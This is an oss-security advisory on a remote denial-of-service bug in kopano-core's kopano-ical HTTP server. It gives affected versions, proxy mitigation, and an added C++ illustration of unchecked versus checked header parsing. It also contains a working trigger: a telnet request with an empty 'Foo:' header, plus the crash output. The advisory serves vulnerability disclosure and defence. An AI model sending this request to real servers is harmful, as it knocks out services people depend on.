Message-ID: <op516nqr-96s1-3r69-4np9-314p89o96951@vanv.qr>
Date: Fri, 2 Apr 2021 10:26:29 +0200 (CEST)
From: Jan Engelhardt <jengelh@...i.de>
To: oss-security@...ts.openwall.com
Subject: kopano-core 11.0.1.77: Remote DoS with out-of-bounds access

Initial publication, no CVE number yet.

# Affected versions

  * kopano-core 11.0.1
  * kopano-core 8.7.20
  * it is believed this affects all other versions too,
    including 10.0.7, 9.1.0, and zarafa 7.2.6.

The "kopano-ical" program implements a network service/trivial HTTP 
server. It fails to properly check HTTP headers, and with a crafted 
request, can be exploited to drive the process into an exception and 
have it terminate.


# Trigger

» ./kopano-ical -F &
» telnet localhost 8000
Trying ::1...
Connected to localhost.
Escape character is '^]'.
GET / HTTP/1.0
Foo:
Connection closed by foreign host.
terminate called after throwing an instance of 'std::out_of_range'
  what():  basic_string::substr: __pos (which is 6) > this->size() (which is 5)


# Mitigation

In conjunction with a proxy, the issue does not occur as they often 
filter lines (LF->CRLF, giving an extra byte). Tested ones: 
nginx-1.19.8 squid-4.14 apache2-2.4.46 tinyproxy-1.10.0
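
The failure class behind the std::out_of_range shown under "Trigger", as an added example that is not part of the original message and is not kopano-ical source code: a header parser that skips a fixed number of bytes after the colon, next to a bounds-checked form. The "+ 2" skip, the function names and the sample lines are assumptions constructed for illustration.

```cpp
// Added illustration, NOT kopano-ical source. The fixed "+ 2" skip is an
// assumed parsing pattern; all input lines below are constructed.
#include <iostream>
#include <stdexcept>
#include <string>
#include <utility>

using Header = std::pair<std::string, std::string>;

// Fragile: assumes every line looks like "Name: value".
// substr(pos) throws std::out_of_range when pos > size(); if find() returns
// npos, npos + 2 wraps around to 1 and the value is silently wrong instead.
Header parse_unchecked(const std::string &line)
{
    auto colon = line.find(':');
    return {line.substr(0, colon), line.substr(colon + 2)};
}

// Hardened: require a separator, then trim optional whitespace rather than
// skipping a fixed byte count. Returns false on a malformed line, never throws
// std::out_of_range on short input.
bool parse_checked(const std::string &line, Header &out)
{
    auto colon = line.find(':');
    if (colon == std::string::npos || colon == 0)
        return false; // caller should answer 400 and keep serving
    auto first = line.find_first_not_of(" \t\r\n", colon + 1);
    auto last = line.find_last_not_of(" \t\r\n");
    out.first = line.substr(0, colon);
    out.second = first == std::string::npos
        ? std::string() : line.substr(first, last - first + 1);
    return true;
}

// True when the fragile parser throws; uncaught, this ends the whole process.
bool unchecked_throws(const std::string &line)
{
    try { parse_unchecked(line); return false; }
    catch (const std::out_of_range &) { return true; }
}

int main()
{
    Header h;
    for (const char *s : {"Foo:", "Foo:\r", "Foo: bar"})
        std::cout << std::string(s).size() << " bytes: unchecked throws="
                  << unchecked_throws(s) << " checked ok=" << parse_checked(s, h) << "\n";
}
```

Under this assumed pattern, one extra trailing byte moves the substr position back inside the string, so the fragile parser no longer throws on the same header.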
